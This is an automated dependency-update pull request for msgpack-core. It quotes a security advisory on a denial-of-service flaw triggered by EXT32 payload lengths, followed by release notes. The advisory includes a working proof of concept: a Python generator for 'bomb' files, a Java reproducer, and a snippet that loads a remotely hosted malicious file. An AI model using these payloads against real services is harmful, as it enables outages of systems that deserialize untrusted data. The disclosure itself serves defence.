Update dependency org.msgpack:msgpack-core to v0.9.11 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
org.msgpack:msgpack-core (source)	0.8.13 → 0.9.11

GitHub Vulnerability Alerts

CVE-2026-21452

Summary

Affected Components:

org.msgpack.core.MessageUnpacker.readPayload()
org.msgpack.core.MessageUnpacker.unpackValue()
org.msgpack.value.ExtensionValue.getData()

A denial-of-service vulnerability exists in MessagePack for Java when deserializing .msgpack files containing EXT32 objects with attacker-controlled payload lengths. While MessagePack-Java parses extension headers lazily, it later trusts the declared EXT payload length when materializing the extension data. When ExtensionValue.getData() is invoked, the library attempts to allocate a byte array of the declared length without enforcing any upper bound. A malicious .msgpack file of only a few bytes can therefore trigger unbounded heap allocation, resulting in JVM heap exhaustion, process termination, or service unavailability. This vulnerability is triggered during model loading / deserialization, making it a model format vulnerability suitable for remote exploitation.

PoC

import msgpack
import struct
import os

OUTPUT_DIR = "bombs"
os.makedirs(OUTPUT_DIR, exist_ok=True)

# EXT format: fixext / ext8 / ext16 / ext32

# ext32 allows attacker-controlled length (uint32)

length = 1
step = 10_000_000

while True:
    try:
        # EXT32: 0xC9 | length (4 bytes) | type (1 byte)
        header = b'\xC9' + struct.pack(">I", length) + b'\x01'
        payload = b'A'   # actual data tiny

        data = header + payload

        fname = f"{OUTPUT_DIR}/ext_length_{length}.msgpack"
        with open(fname, "wb") as f:
            f.write(data)

        print(f"[+] Generated EXT bomb with declared length={length}")
        length += step

    except Exception as e:
        print("[!] Stopped:", e)
        break

Download dependency: curl -LO https://repo1.maven.org/maven2/org/msgpack/msgpack-core/0.9.8/msgpack-core-0.9.8.jar Java Reproducer

// Main.java
import org.msgpack.core.MessagePack;
import org.msgpack.core.MessageUnpacker;
import org.msgpack.value.ExtensionValue;

import java.nio.file.Files;
import java.nio.file.Paths;

public class Main {
    public static void main(String[] args) throws Exception {

        byte[] data = Files.readAllBytes(
            Paths.get("ext_length_470000001.msgpack")
        );

        MessageUnpacker unpacker =
            MessagePack.newDefaultUnpacker(data);

        ExtensionValue ext =
            unpacker.unpackValue().asExtensionValue();

        // Vulnerability trigger:
        byte[] payload = ext.getData();

        System.out.println(payload.length);
    }
}

Compile

javac -cp msgpack-core-0.9.8.jar Main.java

Run (with limited heap)

java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main

Observed Result:

Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    at org.msgpack.core.MessageUnpacker.readPayload(...)
    at org.msgpack.core.MessageUnpacker.unpackValue(...)

var u = new java.net.URL("https://huggingface.co/Blackbloodhacker/msgpack/resolve/main/ext_length_470000001.msgpack");
var d = u.openStream().readAllBytes();
var up = org.msgpack.core.MessagePack.newDefaultUnpacker(d);
up.unpackValue().asExtensionValue().getData();

Run:

java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main

A remotely hosted model file on Hugging Face can cause denial of service when loaded by a Java-based consumer.

Resolution

This issue is addressed in msgpack/msgpack-java@daa2ea6 by gradually allocating memory for large inputs, for both EXT32/BIN32 data types. This patch is released in msgpack-java 0.9.11 https://github.com/msgpack/msgpack-java/releases/tag/v0.9.11

Impact

This vulnerability enables a remote denial-of-service attack against applications that deserialize untrusted .msgpack model files using MessagePack for Java. A specially crafted but syntactically valid .msgpack file containing an EXT32 object with an attacker-controlled, excessively large payload length can trigger unbounded memory allocation during deserialization. When the model file is loaded, the library trusts the declared length metadata and attempts to allocate a byte array of that size, leading to rapid heap exhaustion, excessive garbage collection, or immediate JVM termination with an OutOfMemoryError. The attack requires no malformed bytes, user interaction, or elevated privileges and can be exploited remotely in real-world environments such as model registries, inference services, CI/CD pipelines, and cloud-based model hosting platforms that accept or fetch .msgpack artifacts. Because the malicious file is extremely small yet valid, it can bypass basic validation and scanning mechanisms, resulting in complete service unavailability and potential cascading failures in production systems.

---

Release Notes

msgpack/msgpack-java (org.msgpack:msgpack-core)

v0.9.11

Compare Source

What's Changed

🐛 Bug Fixes

• Fix Scala code formatting by @​xerial in #​939
• Improve readPayload(int) to use gradual memory allocation for large payloads (>64MB) daa2ea6 (Address CVE-2026-21452)

🔗 Dependency Updates

• Update sbt, scripted-plugin to 1.11.4 by @​scala-steward in #​910
• Bump actions/checkout from 4 to 5 by @​dependabot[bot] in #​909
• Update airframe-json, airspec to 2025.1.16 by @​scala-steward in #​912
• Update scalafmt-core to 3.9.9 by @​scala-steward in #​907
• Bump actions/setup-java from 4 to 5 by @​dependabot[bot] in #​914
• Update sbt, scripted-plugin to 1.11.5 by @​scala-steward in #​913
• Update junit-jupiter to 5.13.4 by @​scala-steward in #​905
• Update sbt, scripted-plugin to 1.11.6 by @​scala-steward in #​918
• Update airframe-json, airspec to 2025.1.18 by @​scala-steward in #​920
• Update scalacheck to 1.19.0 by @​scala-steward in #​919
• Update airframe-json, airspec to 2025.1.21 by @​scala-steward in #​929
• Update scala-collection-compat to 2.14.0 by @​scala-steward in #​926
• Update sbt, scripted-plugin to 1.11.7 by @​scala-steward in #​925
• Update junit-jupiter to 5.14.1 by @​scala-steward in #​930
• Update airframe-json, airspec to 2025.1.22 by @​scala-steward in #​938
• Bump actions/cache from 4 to 5 by @​dependabot[bot] in #​937
• Update junit-vintage-engine to 5.14.1 by @​scala-steward in #​931
• Bump actions/checkout from 5 to 6 by @​dependabot[bot] in #​935

🛠 Internal Updates

• Update sbt-scalafmt to 2.5.6 by @​scala-steward in #​932

Full Changelog: msgpack/msgpack-java@v0.9.10...v0.9.11

v0.9.10

Compare Source

What's Changed

🔥 Breaking Changes

• Update jackson-databind to 2.18.4 by @​scala-steward in #​886

🚀 Features

• Add support for jackson field ids by @​brenbar in #​868
• Refactor CI to use matrix strategy and add JDK 24 support by @​xerial in #​895

🐛 Bug Fixes

• Fix Jackson deprecation warnings in MessagePackFactory by @​xerial in #​903

🔗 Dependency Updates

• Update airframe-json, airspec to 2025.1.1 by @​scala-steward in #​872
• Update scala-collection-compat to 2.13.0 by @​scala-steward in #​871
• Update airframe-json, airspec to 2025.1.14 by @​scala-steward in #​889
• Update sbt, scripted-plugin to 1.10.11 by @​scala-steward in #​881

🛠 Internal Updates

• Update sbt-scalafmt to 2.5.4 by @​scala-steward in #​869
• Update sbt-scalafmt to 2.5.5 by @​scala-steward in #​893

📚 Docs

• Add CLAUDE.md for AI-assisted development by @​xerial in #​894
• Upgrade Scala to 3.7.1 and use Scala 3 code format style by @​xerial in #​899
• Update README.md publishing instructions for Sonatype Central by @​xerial in #​900

Other Changes

• Update sbt-dynver to 5.1.1 by @​xerial in #​896
• Migrate from JUnit 4 to JUnit 5 to resolve deprecation warnings by @​xerial in #​897
• Migrate from sbt-sonatype to built-in sonaRelease by @​xerial in #​898
• Skip CI tests for non-code changes using dorny/paths-filter by @​xerial in #​901
• Add scalafmtCheckAll to code format CI by @​xerial in #​902

New Contributors

• @​brenbar made their first contribution in #​868

Full Changelog: msgpack/msgpack-java@v0.9.9...v0.9.10

v0.9.9

Compare Source

What's Changed

🔗 Dependency Updates

• Bump actions/cache from 3 to 4 by @​dependabot in #​795
• Bump release-drafter/release-drafter from 5 to 6 by @​dependabot in #​798
• Update airframe-json, airspec to 24.1.2 by @​scala-steward in #​801
• Update sbt to 1.9.9 by @​scala-steward in #​803
• Update airframe-json, airspec to 24.3.0 by @​scala-steward in #​807
• Update airframe-json, airspec to 24.4.2 by @​scala-steward in #​817
• Update scalacheck to 1.17.1 by @​scala-steward in #​815
• Update scala-collection-compat to 2.12.0 by @​scala-steward in #​814
• Update airframe-json, airspec to 24.4.3 by @​scala-steward in #​820
• Update scalacheck to 1.18.0 by @​scala-steward in #​819
• Update jackson-databind to 2.16.2 by @​scala-steward in #​811
• Update sbt to 1.10.0 by @​scala-steward in #​823
• Update airframe-json, airspec to 24.5.0 by @​scala-steward in #​824
• Update airframe-json, airspec to 24.5.2 by @​scala-steward in #​826
• Update airframe-json, airspec to 24.7.0 by @​scala-steward in #​829
• Update sbt to 1.10.1 by @​scala-steward in #​831
• Update airframe-json, airspec to 24.7.1 by @​scala-steward in #​832
• Update airframe-json, airspec to 24.9.0 by @​scala-steward in #​837
• Update sbt to 1.10.2 by @​scala-steward in #​839
• Update scalacheck to 1.18.1 by @​scala-steward in #​840
• Update airframe-json, airspec to 24.9.3 by @​scala-steward in #​844
• Update sbt, scripted-plugin to 1.10.4 by @​scala-steward in #​852
• Update airframe-json, airspec to 24.10.0 by @​scala-steward in #​850
• Update sbt, scripted-plugin to 1.10.5 by @​scala-steward in #​854
• Bump the version of jackson-databind by @​komamitsu in #​858
• Update airframe-json, airspec to 24.12.1 by @​scala-steward in #​860
• Update sbt, scripted-plugin to 1.10.6 by @​scala-steward in #​859
• Update airframe-json, airspec to 24.12.2 by @​scala-steward in #​863
• Update sbt, scripted-plugin to 1.10.7 by @​scala-steward in #​865

🛠 Internal Updates

• Update sbt-osgi to 0.9.11 by @​scala-steward in #​796
• Update sbt-osgi to 0.10.0 by @​scala-steward in #​797
• Update sbt-pgp to 2.3.0 by @​scala-steward in #​845
• Update sbt-sonatype to 3.12.0 by @​scala-steward in #​846
• Update sbt-sonatype to 3.12.2 by @​scala-steward in #​847
• Update sbt-dynver to 5.1.0 by @​scala-steward in #​848
• avoid deprecated java.net.URL constructor by @​xuwei-k in #​853
• Update sbt-pgp to 2.3.1 by @​scala-steward in #​862

Other Changes

• Improve the performance of jackson-dataformat-msgpack by @​komamitsu in #​866

Full Changelog: msgpack/msgpack-java@v0.9.8...v0.9.9

v0.9.8

Compare Source

What's Changed

🔥 Breaking Changes

• msgpack-jackson (breaking): Update jackson-databind to 2.16.1 by @​scala-steward in #​788

🐛 Bug Fixes

• core: Fix ClassCastException when array values is set as List by @​takezoe in #​794

🔗 Dependency Updates

• Update sbt to 1.9.8 by @​scala-steward in #​790
• Update airframe-json, airspec to 23.12.1 by @​scala-steward in #​791
• Update airframe-json, airspec to 24.1.0 by @​scala-steward in #​792
• Update airframe-json, airspec to 24.1.1 by @​scala-steward in #​793

🛠 Internal Updates

• Update sbt-osgi to 0.9.10 by @​scala-steward in #​789

Full Changelog: msgpack/msgpack-java@v0.9.7...v0.9.8

v0.9.7

Compare Source

What's Changed

🐛 Bug Fixes

• Fix bug in ImmutableTimestampValueImpl. by @​fangzheng in #​786

🔗 Dependency Updates

• Update airframe-json, airspec to 23.9.2 by @​scala-steward in #​767
• Update airframe-json, airspec to 23.9.3 by @​scala-steward in #​769
• Update airframe-json, airspec to 23.10.0 by @​scala-steward in #​772
• Update jackson-databind to 2.15.3 by @​scala-steward in #​771
• Update sbt to 1.9.7 by @​scala-steward in #​775
• Bump actions/checkout from 2 to 4 by @​dependabot in #​777
• Bump actions/cache from 2 to 3 by @​dependabot in #​778
• Update airframe-json, airspec to 23.11.3 by @​scala-steward in #​781
• Bump actions/setup-java from 3 to 4 by @​dependabot in #​784

🛠 Internal Updates

• Update sbt-osgi to 0.9.7 by @​scala-steward in #​773
• Update sbt-osgi to 0.9.8 by @​scala-steward in #​774
• add dependabot.yml for GitHub Actions update by @​xuwei-k in #​776
• Update sbt-osgi to 0.9.9 by @​scala-steward in #​779
• Update sbt-sonatype to 3.10.0 by @​scala-steward in #​783
• internal: Fix fixint test in MessagePackTest. by @​fangzheng in #​785
• internal: Remove dead code in MessagePacker. by @​fangzheng in #​787
• use setup-java instead of deprecated olafurpg/setup-scala by @​xuwei-k in #​770

📚 Docs

• Add MessagePackMapper#handleBigIntegerAndBigDecimalAsString by @​komamitsu in #​768

New Contributors

• @​dependabot made their first contribution in #​777
• @​fangzheng made their first contribution in #​785

Full Changelog: msgpack/msgpack-java@v0.9.6...v0.9.7

v0.9.6

Compare Source

What's Changed

🔥 Breaking Changes

• feature: Support JDK21 (and drop JDK7 support) by @​xerial in #​765

Important: If you need to use DirectByteBuffer (raw memory access) in JDK17 or later, specify two JVM options to allow access to native memory:

--add-opens=java.base/java.nio=ALL-UNNAMED
--add-opens=java.base/sun.nio.ch=ALL-UNNAMED

🔗 Dependency Updates

• Update airframe-json, airspec to 23.7.4 by @​scala-steward in #​752
• Update airframe-json, airspec to 23.8.0 by @​scala-steward in #​754
• Update airframe-json, airspec to 23.8.1 by @​scala-steward in #​756
• Update sbt to 1.9.4 by @​scala-steward in #​759
• Update airframe-json, airspec to 23.8.6 by @​scala-steward in #​760
• Update sbt to 1.9.6 by @​scala-steward in #​763
• Update airframe-json, airspec to 23.9.1 by @​scala-steward in #​762

🛠 Internal Updates

• Switch the default branch from develop to main by @​xerial in #​755
• Update sbt-scalafmt to 2.5.2 by @​scala-steward in #​761
• internal: Automatically generate release notes by @​xerial in #​766

📚 Docs

• Correct MessageUnpacker javadoc by @​takezoe in #​764

New Contributors

• @​takezoe made their first contribution in #​764

Full Changelog: msgpack/msgpack-java@v0.9.5...v0.9.6

v0.9.5

Compare Source

What's Changed

🐛 Bug Fixes

• core (fix): Fix MessageUnpacker.unpackValue to check the custom stringSizeLimit @​xerial (#​753)

🔗 Dependency Updates

• Update sbt to 1.9.3 @​scala-steward (#​750)
• Update airframe-json, airspec to 23.7.2 @​scala-steward (#​748)
• Update airframe-json, airspec to 23.7.1 @​scala-steward (#​744)
• Update sbt to 1.9.2 @​scala-steward (#​746)

🛠 Internal Updates

• Update airframe-json, airspec to 23.7.2 @​scala-steward (#​748)
• Update airframe-json, airspec to 23.7.1 @​scala-steward (#​744)

Full Changelog: msgpack/msgpack-java@v0.9.4...v0.9.5

v0.9.4

Compare Source

What's Changed

🔥 Breaking Changes

• msgpack-jackson: Update jackson-databind to 2.15.2 @​scala-steward (#​734)

🚀 Features

• Add MessagePackMapper#handleBigDecimalAsString @​komamitsu (#​745)
• Support timestamp extension in jackson-dataformat-msgpack @​komamitsu (#​677)
• Small improvement of msgpack-jackson bench @​komamitsu (#​705)

🔗 Dependency Updates

• Update sbt to 1.9.1 @​scala-steward (#​741)
• Update jackson-databind to 2.15.2 @​scala-steward (#​734)
• Update scala-collection-compat to 2.11.0 @​scala-steward (#​740)
• Update airframe-json, airspec to 23.5.7 @​scala-steward (#​739)
• Update sbt to 1.9.0 @​scala-steward (#​738)
• Update airframe-json, airspec to 23.5.6 @​scala-steward (#​736)
• Update sbt to 1.8.3 @​scala-steward (#​735)
• Update jackson-databind to 2.14.3 @​scala-steward (#​730)
• Update airframe-json, airspec to 23.5.2 @​scala-steward (#​731)
• Update airframe-json, airspec to 23.5.0 @​scala-steward (#​728)
• Update scala-collection-compat to 2.10.0 @​scala-steward (#​726)
• Update airframe-json, airspec to 23.3.4 @​scala-steward (#​723)
• Update airframe-json, airspec to 23.3.0 @​scala-steward (#​718)
• Update airframe-json, airspec to 23.2.5 @​scala-steward (#​717)

🛠 Internal Updates

• Update scala-collection-compat to 2.11.0 @​scala-steward (#​740)
• Update airframe-json, airspec to 23.5.7 @​scala-steward (#​739)
• Update airframe-json, airspec to 23.5.6 @​scala-steward (#​736)
• Update sbt-dynver to 5.0.1 @​scala-steward (#​733)
• Update sbt-sonatype to 3.9.21 @​scala-steward (#​737)
• Update airframe-json, airspec to 23.5.2 @​scala-steward (#​731)
• Update sbt-sonatype to 3.9.20 @​scala-steward (#​732)
• Update sbt-sonatype to 3.9.19 @​scala-steward (#​729)
• Update airframe-json, airspec to 23.5.0 @​scala-steward (#​728)
• Update scala-collection-compat to 2.10.0 @​scala-steward (#​726)
• Update airframe-json, airspec to 23.3.4 @​scala-steward (#​723)
• Update airframe-json, airspec to 23.3.0 @​scala-steward (#​718)
• Update sbt-sonatype to 3.9.18 @​scala-steward (#​719)
• Update airframe-json, airspec to 23.2.5 @​scala-steward (#​717)
• update sbt script @​xerial (#​714)
• Introduce release drafter @​xerial (#​713)

📚 Docs

• Add MessagePackMapper#handleBigDecimalAsString @​komamitsu (#​745)

Full Changelog: msgpack/msgpack-java@v0.9.3...v0.9.4

v0.9.3

Compare Source

This version supports JDK17 #​660.

Important: If you need to use DirectByteBuffer (raw memory access) in JDK17 or later, specify two JVM options to allow accessing
native memory:

--add-opens=java.base/java.nio=ALL-UNNAMED
--add-opens=java.base/sun.nio.ch=ALL-UNNAMED

Internal updates:

• Use SPDX-ID in license name #​653
• Update airframe-json, airspec to 22.6.4 #​659
• Update akka-actor to 2.6.19 #​647

v0.9.2

Compare Source

Internal updates:

• Update jackson-databind to 2.13.3 #​650
• Update akka-actor to 2.6.19 #​631
• Update airframe-json, airspec to 22.6.1 #​649
• Update scalacheck to 1.16.0 #​636
• Update scala-collection-compat to 2.7.0 #​632
• Update sbt-sonatype to 3.9.13 #​644
• Update airframe-json, airspec to 22.5.0 #​643
• Update sbt to 1.6.2 #​630

v0.9.1

Compare Source

Bug fixes and improvements:

• Keep consistent read size after closing MessageUnpacker (#​621) @​okumin
• Fixed examples relative link in README (#​622) @​zbuster05
• Add an ObjectMapper shorthand @​cyberdelia (#​620)
• Specify the bufferSize of the ArrayBufferOutput (#​597) @​szh

Internal updates:

• Update akka-actor to 2.6.18 (#​614) @​Scala Steward
• Update airframe-json, airspec to 22.2.0 (#​626) @​Scala Steward
• Update junit-interface to 0.13.3 (#​617) @​Scala Steward
• Update sbt-scalafmt to 2.4.6 (#​616) @​Scala Steward
• Upgrade sbt to 1.5.6 (#​610) @​Taro L. Saito
• Update scala-collection-compat to 2.6.0 (#​604) @​Scala Steward

Known issues:

• Unpack method doesn't work in JDK17 #​600

v0.9.0

Compare Source

This version support reading and writing Timestamp values.
Packer and unpacker interfaces added pack/unpackTimestamp methods.

Timestamp value in MessagePack is an extension type value whose code is -1. You can read TimestampValue object with MessgageUnapcker.unpackValue method.
If you are using low-level unpack methods (e.g., unpackInt, unpackExtension, etc.),
you need to read unpackExtensionHeader first, and if extHeader.isTimestampType() is true, call unpackTimestamp(extHeader).

Timestamp values are represented with java.time.Instant objects.
You can extract the unixtime value with Instant.getEpochSecond(), unixtime with milliseconds resolution with Instant.toEpochMilli(), and nano-resolution time with Instant.getNano().

As TimestampValue is just a sub class of ExtensionValue, no change requierd in your code that are traversing MessagePack data with MessageUnpacker.unpackValue method.

• Added Timestamp support #​565 and low-level APIs #​580 for
  reading timestamp values.

Dependency updates:

• Update jackson-databind to 2.10.5.1 #​559

Internal updates:

• Update akka-actor to 2.6.14 #​579
• Fix for Scala 2.13 syntax #​577
• Update airframe-json, airspec to 21.6.0 #​576
• Update scala-library to 2.13.6 #​568
• Update sbt to 1.5.3 #​575

v0.8.24

Compare Source

• Rebuild with JDK8 for Android compatibility #​567

v0.8.23

Compare Source

• Produce stable map values #​548
• Fixes #​544: Fix a bug in reading EXT32 of 2GB size #​545
• Add a warning note for the usage of MessageUnpacker.readPayloadAsReference #​546

Intenral changes:

• Add a script for releasing a new version of msgpack-java at CI
• Publish a snapshot version for every main branch commit #​556
• Use dynamic versioning with Git tags v0.x.y format #​555
• Update ScalaTest and ScalaCheck versions #​554
• Remove findbugs #​553
• Update build settings to use latest version of sbt and plugins #​552
• Run GitHub Actions for develop and main branches #​551
• Remove Travis build #​550

v0.8.22

Compare Source

• Support extension type key in Map #​535
• Remove addTargetClass() and addTargetTypeReference() from ExtensionTypeCustomDeserializers #​539
• Fix a bug BigDecimal serializaion fails #​540

v0.8.21

Compare Source

• Fix indexing bug in ValueFactory #​525
• Support numeric types in MessagePackParser.getText() #​527
• Use jackson-databind 2.10.5 for security vulnerability #​528
• (internal) Ensure building msgpack-java for Java 7 target #​523

v0.8.20

Compare Source

• Rebuild 0.8.19 with JDK8

v0.8.19

Compare Source

• Support JDK11
• msgpack-jackson: Fixes #​515

v0.8.18

Compare Source

• (internal) Update sbt related dependencies #​507
• Use jackson-databind 2.9.9.3 for security vulnerability #​511

v0.8.17

Compare Source

• Fix OOM exception for invalid msgpack messages #​500
• Use jackson-databind 2.9.9 for security vulnerability #​505

v0.8.16

Compare Source

• Fix NPE at ObjectMapper#copy with MessagePackFactory when ExtensionTypeCustomDeserializers isn't set #​471

v0.8.15

Compare Source

• Suppress a warning in ValueFactory #​457
• Add MessagePacker#clear() method to clear position #​459
• Support ObjectMapper#copy with MessagePackFactory #​454
• Use jackson-databind 2.8.11.1 for security vulnerability #​467
• (internal) Remove "-target:jvm-1.7" from scalacOptions #​456
• (internal) Replace sbt test-only command with testOnly #​445
• (internal) Use JavaConverters instead of JavaConversions in unit tests #​446

v0.8.14

Compare Source

• Add MessageUnpacker.tryUnpackNil() for peeking whether the next value is nil or not.
• Add MessageBufferPacker.getBufferSize().
• Improved MessageUnpacker.readPayload performance #​436
• Fixed a bug that ChannelBufferInput#next blocks until the buffer is filled. #​428
• (internal) Upgraded to sbt-1.0.4 for better Java9 support
• (internal) Dropped Java7 tests on TravisCI, but msgpack-java is still built for Java7 (1.7) target

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.